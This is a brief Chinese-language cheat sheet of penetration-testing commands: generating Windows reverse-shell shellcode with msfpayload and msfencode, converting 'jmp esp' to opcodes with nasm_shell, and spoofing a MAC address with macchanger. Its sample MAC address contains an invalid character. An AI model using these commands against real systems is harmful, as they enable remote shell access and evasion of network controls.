1、生成shell code
/usr/share/framework2/msfpayload 如:生成windows的反彈444端口的shell code /usr/share/framework2/msfpayload win32_reverse LHOST=10.0.0.128 LPORT=444 C
##排除某些壞字符\x00\x0a\x0d
/usr/share/framework2/msfpayload win32_reverse LHOST=10.0.0.128 LPORT=444 R |/usr/share/framework2/msfencode -b "\x00\x0a\x0d
2、將匯編指令轉換成二進制和16進制
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb 如: root@kali:/usr/local/src# /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb nasm > jmp esp 00000000 FFE4 jmp esp
3、更改mac地址
macchanger
如:更改eth0的mac地址 macchanger -m 00:1a:28:4b:8q:23 eth0